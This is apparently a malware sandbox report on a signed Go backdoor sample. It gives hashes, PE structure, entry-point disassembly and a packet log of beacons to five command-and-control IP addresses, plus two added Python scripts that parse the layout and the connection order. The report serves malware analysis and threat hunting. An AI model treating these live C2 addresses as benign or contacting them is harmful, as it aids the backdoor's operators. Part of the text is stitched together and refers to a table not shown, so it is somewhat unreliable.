                                          Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.D....................+.H..!...e........System.Configuration.Ins
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.3085429709464504
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:BwqqVoHR71.exe
                                          File size:19'172'088 bytes
                                          MD5:0a21a94198f6157abb36bf55cb43be27
                                          SHA1:9a01b5e8a68be2b49250c730f8c3ecaee3734170
                                          SHA256:53fcb9786b102a6ad732878445deb13132324e59487ac841cba4e38bb990bee6
                                          SHA512:a09ed0c8e69a4f399b4c747d1b0565693caf64a0e7785ea55efd31819d638f3f84d626bdb7607dcf9338785a403f88b72c7566c532a56f2b6ded0d5c77d80fa1
                                          SSDEEP:196608:haiDgib6rJD1c/naBrlHmD0Aol3MM146sy3sjXsJrtTCZiL:p6D1UaVkDxQ4BmtZ
                                          TLSH:7917AE10FA9B40F1ED034971919BB26F63346E058B25CBDBEB957B2EFC376920876205
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........~"...............M.........@........`....@..........................P)......:%...@................................
                                          Icon Hash:833961634951097f
                                          Entrypoint:0x471c40
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:6
                                          OS Version Minor:1
                                          File Version Major:6
                                          File Version Minor:1
                                          Subsystem Version Major:6
                                          Subsystem Version Minor:1
                                          Import Hash:4f2f006e2ecf7172ad368f8289dc96c1
                                          Signature Valid:false
                                          Signature Issuer:CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                          Signature Validation Error:A certificate was explicitly revoked by its issuer
                                          Error Number:-2146762484
                                          Not Before, Not After
                                          • 09/09/2024 10:06:13 09/09/2025 10:06:12
                                          Subject Chain
                                          • CN="Guizhou Sixuanda Technology Co., Ltd.", O="Guizhou Sixuanda Technology Co., Ltd.", L=Guiyang, S=Guizhou, C=CN, SERIALNUMBER=91520100MA6DNNXK11, OID.1.3.6.1.4.1.311.60.2.1.1=Guiyang, OID.1.3.6.1.4.1.311.60.2.1.2=Guizhou, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
                                          Version:3
                                          Thumbprint MD5:62A1343435FC5131E11FA8C871BB3A1B
                                          Thumbprint SHA-1:A3AFF46C5F8E2A1F750C570698B864E75553E61F
                                          Thumbprint SHA-256:87D45B86DFCC84C5EF8338026C26F34935DBAA383A7DD583F48675AF77C957A4
                                          Serial:332576FE101609502C23F70055B4A3BE
                                          Instruction
                                          jmp 00007F64A8E2F6F0h
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          sub esp, 28h
                                          mov dword ptr [esp+1Ch], ebx
                                          mov dword ptr [esp+10h], ebp
                                          mov dword ptr [esp+14h], esi
                                          mov dword ptr [esp+18h], edi
                                          mov dword ptr [esp], eax
                                          mov dword ptr [esp+04h], ecx
                                          call 00007F64A8E139F6h
                                          mov eax, dword ptr [esp+08h]
                                          mov edi, dword ptr [esp+18h]
                                          mov esi, dword ptr [esp+14h]
                                          mov ebp, dword ptr [esp+10h]
                                          mov ebx, dword ptr [esp+1Ch]
                                          add esp, 28h
                                          retn 0004h
                                          ret
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          sub esp, 08h
                                          mov ecx, dword ptr [esp+0Ch]
                                          mov edx, dword ptr [ecx]
                                          mov eax, esp
                                          mov dword ptr [edx+04h], eax
                                          sub eax, 00010000h
                                          mov dword ptr [edx], eax
                                          add eax, 00000BA0h
                                          mov dword ptr [edx+08h], eax
                                          mov dword ptr [edx+0Ch], eax
                                          lea edi, dword ptr [ecx+34h]
                                          mov dword ptr [edx+18h], ecx
                                          mov dword ptr [edi], edx
                                          mov dword ptr [esp+04h], edi
                                          call 00007F64A8E31B54h
                                          cld
                                          call 00007F64A8E30BDEh
                                          call 00007F64A8E2F819h
                                          add esp, 08h
                                          ret
                                          jmp 00007F64A8E31A00h
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          mov ebx, dword ptr [esp+04h]
                                          mov ebp, esp
                                          mov dword ptr fs:[00000034h], 00000000h
                                          mov ecx, dword ptr [ebx+04h]
                                          cmp ecx, 00000000h
                                          je 00007F64A8E31A01h
                                          mov eax, ecx
                                          shl eax, 02h
                                          sub esp, eax
                                          mov edi, esp
                                          mov esi, dword ptr [ebx+08h]
                                          cld
                                          rep movsd
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x122d000 | 0x45e | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1276000 | 0x1e0d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1246200 | 0x28f8 | .reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x122e000 | 0x46ac8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1166e00 | 0xb8 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Note: the IMAGE_DIRECTORY_ENTRY_SECURITY value is a file offset, not an RVA (the certificate table is never mapped), so the ".reloc" attribution for that row is an artifact of reading 0x1246200 as an RVA; the 0x28f8-byte Authenticode blob sits at the end of the 19'172'088-byte file.
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4dc968 | 0x4dca00 | f482a2ef2cb5edb87b98c38afb691406 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x4de000 | 0xc87c4c | 0xc87e00 | fb37f6883da54d37c8d09448d61f3fe6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1166000 | 0xc6ea0 | 0x7c000 | 7c710d50a908c7f6ab3014874330232b | False | 0.27440618699596775 | data | 5.963241990946737 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x122d000 | 0x45e | 0x600 | cd66f39cc4398db79c4b9999994e1d88 | False | 0.3626302083333333 | data | 4.068932523700792 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x122e000 | 0x46ac8 | 0x46c00 | 1516e6d890589227101e0ac3356c7e25 | False | 0.5061354350706714 | data | 6.6069875234777795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x1275000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x1276000 | 0x1e0d8 | 0x1e200 | db3853b5e9f878d7b090889cc5c58937 | False | 0.267083765560166 | data | 3.7343061086588305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
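The section table, the file size and the data-directory entries above are enough for a few layout checks without the binary in hand. The script below is an added example and not part of the Joe Sandbox report: it takes those values as transcribed from this page (constructed input), infers the section and file alignment, verifies that the sections are contiguous in memory, confirms that the Authenticode blob referenced by IMAGE_DIRECTORY_ENTRY_SECURITY ends exactly at end of file (so nothing trails the revoked signature as an overlay), flags any section that is both writable and executable, and reports sections whose virtual size exceeds their raw size. It also shows why a tool that treats the SECURITY entry as an RVA attributes it to .reloc.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Section:
    name: str
    va: int            # RVA at which the section is mapped
    vsize: int         # VirtualSize
    rawsize: int       # SizeOfRawData
    flags: frozenset   # IMAGE_SCN_* names without the prefix


# Constructed input: section table, file size and certificate-table entry as given in the report.
SECTIONS = [
    Section(".text",   0x1000,    0x4dc968, 0x4dca00, frozenset({"CNT_CODE", "MEM_EXECUTE", "MEM_READ"})),
    Section(".rdata",  0x4de000,  0xc87c4c, 0xc87e00, frozenset({"CNT_INITIALIZED_DATA", "MEM_READ"})),
    Section(".data",   0x1166000, 0xc6ea0,  0x7c000,  frozenset({"CNT_INITIALIZED_DATA", "MEM_READ", "MEM_WRITE"})),
    Section(".idata",  0x122d000, 0x45e,    0x600,    frozenset({"CNT_INITIALIZED_DATA", "MEM_READ", "MEM_WRITE"})),
    Section(".reloc",  0x122e000, 0x46ac8,  0x46c00,  frozenset({"CNT_INITIALIZED_DATA", "MEM_DISCARDABLE", "MEM_READ"})),
    Section(".symtab", 0x1275000, 0x4,      0x200,    frozenset({"MEM_DISCARDABLE", "MEM_READ"})),
    Section(".rsrc",   0x1276000, 0x1e0d8,  0x1e200,  frozenset({"CNT_INITIALIZED_DATA", "MEM_READ"})),
]
FILE_SIZE = 19_172_088
SECURITY_DIR = (0x1246200, 0x28f8)   # (file offset, size) of the Authenticode signature


def align_up(value, alignment):
    return (value + alignment - 1) & ~(alignment - 1)


def infer_alignment(values, candidates=(0x1000, 0x200, 0x10)):
    """Largest candidate alignment that every value is a multiple of."""
    for a in candidates:
        if all(v % a == 0 for v in values):
            return a
    return 1


def section_for_rva(rva, sections=SECTIONS):
    """Name of the section whose mapped range contains rva, or None."""
    for s in sections:
        if s.va <= rva < s.va + max(s.vsize, s.rawsize):
            return s.name
    return None


def check_layout(sections=SECTIONS, file_size=FILE_SIZE, security=SECURITY_DIR):
    sec_align = infer_alignment([s.va for s in sections])
    file_align = infer_alignment([s.rawsize for s in sections])
    va_gaps = []
    for a, b in zip(sections, sections[1:]):
        expected = align_up(a.va + a.vsize, sec_align)
        if expected != b.va:                      # hole or overlap between consecutive sections
            va_gaps.append((a.name, b.name, hex(expected), hex(b.va)))
    cert_off, cert_size = security
    return {
        "section_alignment": sec_align,
        "file_alignment": file_align,
        "va_gaps": va_gaps,
        "image_end": align_up(sections[-1].va + sections[-1].vsize, sec_align),
        "cert_ends_at_eof": cert_off + cert_size == file_size,
        "overlay_bytes": file_size - (cert_off + cert_size),   # data after the signature, if any
        "writable_executable": [s.name for s in sections if {"MEM_WRITE", "MEM_EXECUTE"} <= s.flags],
        "bss_like": {s.name: s.vsize - s.rawsize for s in sections if s.vsize > s.rawsize},
    }


if __name__ == "__main__":
    for key, value in check_layout().items():
        print(f"{key}: {value}")
    print("entrypoint 0x471c40 lies in", section_for_rva(0x471c40))
    print("0x1246200 read as an RVA would lie in", section_for_rva(0x1246200))
```

On this report's values the script finds 0x1000 section alignment and 0x200 file alignment, no gaps between sections, an image end of 0x1295000, a certificate table that ends at byte 19'172'088 (no overlay behind the signature), no writable-and-executable section, and 0x4aea0 bytes of zero-filled space in .data beyond its raw data, which is consistent with a Go-linked binary (the .symtab section is another Go linker trait) keeping its bss inside .data.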
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x12762a4 | 0x4524 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9666101694915255
RT_ICON | 0x127a7c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.10524370046137466
RT_ICON | 0x128aff0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.1844000944733113
RT_ICON | 0x128f218 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.24180497925311203
RT_ICON | 0x12917c0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.29338649155722324
RT_ICON | 0x1292868 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.3762295081967213
RT_ICON | 0x12931f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.44680851063829785
RT_GROUP_ICON | 0x1293658 | 0x68 | data | | | 0.7596153846153846
RT_VERSION | 0x12936c0 | 0x4b8 | COM executable for DOS | English | United States | 0.29387417218543044
RT_MANIFEST | 0x1293b78 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
DLL | Import
kernel32.dll | WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
Language of compilation system | Country where language is spoken
English | United States
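The TCP packet list that follows shows the sample opening one connection after another to five hosts on port 80, using source ports 49741 through 49745. The script below is an added example and not part of the Joe Sandbox report: it reads rows in that shape (timestamp, source port, destination port, source IP, destination IP; a subset is transcribed here as constructed input), groups them into client-initiated sessions, and reports the order in which the hosts are contacted together with the delay between the previous host's last reply and the next connect. The sandbox address 192.168.2.4 is taken from the report; the pipe-separated input layout is this example's own choice.

```python
import re
from dataclasses import dataclass

SANDBOX_IP = "192.168.2.4"   # the analysis VM, as in the report

# Constructed input: a subset of the report's packet rows, fields separated by '|'
# (timestamp | source port | destination port | source IP | destination IP).
SAMPLE_ROWS = """\
Oct 18, 2024 14:03:03.001117945 CEST|49741|80|192.168.2.4|46.8.232.106
Oct 18, 2024 14:03:03.006057978 CEST|80|49741|46.8.232.106|192.168.2.4
Oct 18, 2024 14:03:03.007747889 CEST|49741|80|192.168.2.4|46.8.232.106
Oct 18, 2024 14:03:03.851664066 CEST|80|49741|46.8.232.106|192.168.2.4
Oct 18, 2024 14:03:03.853458881 CEST|49742|80|192.168.2.4|46.8.236.61
Oct 18, 2024 14:03:03.858932018 CEST|80|49742|46.8.236.61|192.168.2.4
Oct 18, 2024 14:03:04.725080967 CEST|80|49742|46.8.236.61|192.168.2.4
Oct 18, 2024 14:03:04.726628065 CEST|49743|80|192.168.2.4|93.185.159.253
Oct 18, 2024 14:03:04.731476068 CEST|80|49743|93.185.159.253|192.168.2.4
Oct 18, 2024 14:03:05.599980116 CEST|80|49743|93.185.159.253|192.168.2.4
Oct 18, 2024 14:03:05.601489067 CEST|49744|80|192.168.2.4|91.212.166.91
Oct 18, 2024 14:03:05.606509924 CEST|80|49744|91.212.166.91|192.168.2.4
Oct 18, 2024 14:03:06.515130997 CEST|80|49744|91.212.166.91|192.168.2.4
Oct 18, 2024 14:03:06.516613960 CEST|49745|80|192.168.2.4|188.130.206.243
Oct 18, 2024 14:03:06.521511078 CEST|80|49745|188.130.206.243|192.168.2.4
Oct 18, 2024 14:03:07.374522924 CEST|80|49745|188.130.206.243|192.168.2.4
Oct 18, 2024 14:03:07.375070095 CEST|49741|80|192.168.2.4|46.8.232.106
"""

TIME_RE = re.compile(r"(\d{2}):(\d{2}):(\d{2})\.(\d{1,9})")


@dataclass(frozen=True)
class Packet:
    ts: float      # seconds since midnight; nanosecond digits are kept
    sport: int
    dport: int
    src: str
    dst: str


def parse_time(text):
    """Time of day in seconds; sufficient for one capture taken on a single day."""
    m = TIME_RE.search(text)
    if m is None:
        raise ValueError(f"no hh:mm:ss.fraction in {text!r}")
    h, mi, s, frac = m.groups()
    return int(h) * 3600 + int(mi) * 60 + int(s) + int(frac.ljust(9, "0")) / 1e9


def parse_rows(text):
    pkts = []
    for line in text.strip().splitlines():
        ts, sport, dport, src, dst = (f.strip() for f in line.split("|"))
        pkts.append(Packet(parse_time(ts), int(sport), int(dport), src, dst))
    return sorted(pkts, key=lambda p: p.ts)


def contact_sequence(pkts, client=SANDBOX_IP):
    """Servers in the order the client first connects to them.

    A session is (client port, server, server port). For each new session the
    gap is measured from the previous server's last reply seen before this
    connect, so later teardown packets on old sessions do not distort it.
    """
    seq, seen = [], set()
    for p in pkts:
        if p.src != client:
            continue
        key = (p.sport, p.dst, p.dport)
        if key in seen:
            continue
        seen.add(key)
        gap = None
        if seq:
            prev = seq[-1]
            replies = [q.ts for q in pkts
                       if q.src == prev["server"] and q.sport == prev["port"]
                       and q.dst == client and q.dport == prev["client_port"] and q.ts < p.ts]
            if replies:
                gap = round(p.ts - max(replies), 4)
        seq.append({"server": p.dst, "port": p.dport, "client_port": p.sport,
                    "start": p.ts, "gap_after_prev_reply": gap})
    return seq


if __name__ == "__main__":
    for s in contact_sequence(parse_rows(SAMPLE_ROWS)):
        print(f"{s['server']}:{s['port']} via {s['client_port']}  gap={s['gap_after_prev_reply']}")
```

On these rows each new connection starts roughly 1.5 to 1.8 ms after the previous server's last packet, so the sample is not failing over on a timeout: it contacts each host only once the previous one has answered, and walks the full list. The five destinations are the IOC list to block or hunt for; three of them also appear in the IP context table above as infrastructure shared with other GO Backdoor samples.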
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 18, 2024 14:03:03.001117945 CEST | 49741 | 80 | 192.168.2.4 | 46.8.232.106
Oct 18, 2024 14:03:03.006057978 CEST | 80 | 49741 | 46.8.232.106 | 192.168.2.4
Oct 18, 2024 14:03:03.006227970 CEST | 49741 | 80 | 192.168.2.4 | 46.8.232.106
Oct 18, 2024 14:03:03.007747889 CEST | 49741 | 80 | 192.168.2.4 | 46.8.232.106
Oct 18, 2024 14:03:03.012617111 CEST | 80 | 49741 | 46.8.232.106 | 192.168.2.4
Oct 18, 2024 14:03:03.851664066 CEST | 80 | 49741 | 46.8.232.106 | 192.168.2.4
Oct 18, 2024 14:03:03.853458881 CEST | 49742 | 80 | 192.168.2.4 | 46.8.236.61
Oct 18, 2024 14:03:03.858932018 CEST | 80 | 49742 | 46.8.236.61 | 192.168.2.4
Oct 18, 2024 14:03:03.859328032 CEST | 49742 | 80 | 192.168.2.4 | 46.8.236.61
Oct 18, 2024 14:03:03.859328032 CEST | 49742 | 80 | 192.168.2.4 | 46.8.236.61
Oct 18, 2024 14:03:03.864801884 CEST | 80 | 49742 | 46.8.236.61 | 192.168.2.4
Oct 18, 2024 14:03:03.908783913 CEST | 49741 | 80 | 192.168.2.4 | 46.8.232.106
Oct 18, 2024 14:03:04.725080967 CEST | 80 | 49742 | 46.8.236.61 | 192.168.2.4
Oct 18, 2024 14:03:04.726628065 CEST | 49743 | 80 | 192.168.2.4 | 93.185.159.253
Oct 18, 2024 14:03:04.731476068 CEST | 80 | 49743 | 93.185.159.253 | 192.168.2.4
Oct 18, 2024 14:03:04.731647015 CEST | 49743 | 80 | 192.168.2.4 | 93.185.159.253
Oct 18, 2024 14:03:04.732546091 CEST | 49743 | 80 | 192.168.2.4 | 93.185.159.253
Oct 18, 2024 14:03:04.737296104 CEST | 80 | 49743 | 93.185.159.253 | 192.168.2.4
Oct 18, 2024 14:03:04.779726028 CEST | 49742 | 80 | 192.168.2.4 | 46.8.236.61
Oct 18, 2024 14:03:05.599980116 CEST | 80 | 49743 | 93.185.159.253 | 192.168.2.4
Oct 18, 2024 14:03:05.601489067 CEST | 49744 | 80 | 192.168.2.4 | 91.212.166.91
Oct 18, 2024 14:03:05.606509924 CEST | 80 | 49744 | 91.212.166.91 | 192.168.2.4
Oct 18, 2024 14:03:05.606632948 CEST | 49744 | 80 | 192.168.2.4 | 91.212.166.91
Oct 18, 2024 14:03:05.606853962 CEST | 49744 | 80 | 192.168.2.4 | 91.212.166.91
Oct 18, 2024 14:03:05.611644030 CEST | 80 | 49744 | 91.212.166.91 | 192.168.2.4
Oct 18, 2024 14:03:05.654145002 CEST | 49743 | 80 | 192.168.2.4 | 93.185.159.253
Oct 18, 2024 14:03:06.515130997 CEST | 80 | 49744 | 91.212.166.91 | 192.168.2.4
Oct 18, 2024 14:03:06.516613960 CEST | 49745 | 80 | 192.168.2.4 | 188.130.206.243
Oct 18, 2024 14:03:06.521511078 CEST | 80 | 49745 | 188.130.206.243 | 192.168.2.4
Oct 18, 2024 14:03:06.521625042 CEST | 49745 | 80 | 192.168.2.4 | 188.130.206.243
Oct 18, 2024 14:03:06.521856070 CEST | 49745 | 80 | 192.168.2.4 | 188.130.206.243
Oct 18, 2024 14:03:06.526635885 CEST | 80 | 49745 | 188.130.206.243 | 192.168.2.4
Oct 18, 2024 14:03:06.569183111 CEST | 49744 | 80 | 192.168.2.4 | 91.212.166.91
Oct 18, 2024 14:03:07.374522924 CEST | 80 | 49745 | 188.130.206.243 | 192.168.2.4
Oct 18, 2024 14:03:07.374855995 CEST | 49745 | 80 | 192.168.2.4 | 188.130.206.243
Oct 18, 2024 14:03:07.375070095 CEST | 49741 | 80 | 192.168.2.4 | 46.8.232.106
Oct 18, 2024 14:03:07.375077009 CEST | 49744 | 80 | 192.168.2.4 | 91.212.166.91
Oct 18, 2024 14:03:07.375077963 CEST | 49742 | 80 | 192.168.2.4 | 46.8.236.61
Oct 18, 2024 14:03:07.375078917 CEST | 49743 | 80 | 192.168.2.4 | 93.185.159.253
Oct 18, 2024 14:03:07.380240917 CEST | 80 | 49745 | 188.130.206.243 | 192.168.2.4
Oct 18, 2024 14:03:07.380445957 CEST | 49745 | 80 | 192.168.2.4 | 188.130.206.243
Oct 18, 2024 14:03:07.380803108 CEST | 80 | 49741 | 46.8.232.106 | 192.168.2.4
Oct 18, 2024 14:03:07.380835056 CEST | 80 | 49744 | 91.212.166.91 | 192.168.2.4
Oct 18, 2024 14:03:07.380856037 CEST | 49741 | 80 | 192.168.2.4 | 46.8.232.106
Oct 18, 2024 14:03:07.380867004 CEST | 80 | 49742 | 46.8.236.61 | 192.168.2.4
Oct 18, 2024 14:03:07.380897999 CEST | 80 | 49743 | 93.185.159.253 | 192.168.2.4
Oct 18, 2024 14:03:07.380897045 CEST | 49744 | 80 | 192.168.2.4 | 91.212.166.91
Oct 18, 2024 14:03:07.380928993 CEST | 49742 | 80 | 192.168.2.4 | 46.8.236.61
                                          Oct 18, 2024 14:03:07.380945921 CEST4974380192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:37.377110958 CEST4980380192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:37.381903887 CEST804980346.8.232.106192.168.2.4
                                          Oct 18, 2024 14:03:37.382122040 CEST4980380192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:37.382446051 CEST4980380192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:37.387204885 CEST804980346.8.232.106192.168.2.4
                                          Oct 18, 2024 14:03:38.261029005 CEST804980346.8.232.106192.168.2.4
                                          Oct 18, 2024 14:03:38.262501955 CEST4980980192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:38.267400026 CEST804980946.8.236.61192.168.2.4
                                          Oct 18, 2024 14:03:38.267601967 CEST4980980192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:38.267755985 CEST4980980192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:38.272521973 CEST804980946.8.236.61192.168.2.4
                                          Oct 18, 2024 14:03:38.315036058 CEST4980380192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:39.119452000 CEST804980946.8.236.61192.168.2.4
                                          Oct 18, 2024 14:03:39.120855093 CEST4981580192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:39.125801086 CEST804981593.185.159.253192.168.2.4
                                          Oct 18, 2024 14:03:39.125868082 CEST4981580192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:39.126230001 CEST4981580192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:39.131046057 CEST804981593.185.159.253192.168.2.4
                                          Oct 18, 2024 14:03:39.173418045 CEST4980980192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:40.064974070 CEST804981593.185.159.253192.168.2.4
                                          Oct 18, 2024 14:03:40.066371918 CEST4982180192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:40.071341991 CEST804982191.212.166.91192.168.2.4
                                          Oct 18, 2024 14:03:40.071435928 CEST4982180192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:40.071691990 CEST4982180192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:40.076515913 CEST804982191.212.166.91192.168.2.4
                                          Oct 18, 2024 14:03:40.119621038 CEST4981580192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:41.001111984 CEST804982191.212.166.91192.168.2.4
                                          Oct 18, 2024 14:03:41.002522945 CEST4982780192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:41.007766008 CEST8049827188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:03:41.007884979 CEST4982780192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:41.008100986 CEST4982780192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:41.012887001 CEST8049827188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:03:41.055577040 CEST4982180192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:42.205930948 CEST8049827188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:03:42.206183910 CEST4982780192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:42.206233025 CEST4982180192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:42.206264973 CEST4981580192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:42.206305027 CEST4980980192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:42.206331968 CEST4980380192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:42.212474108 CEST8049827188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:03:42.212532043 CEST4982780192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:42.212682009 CEST804982191.212.166.91192.168.2.4
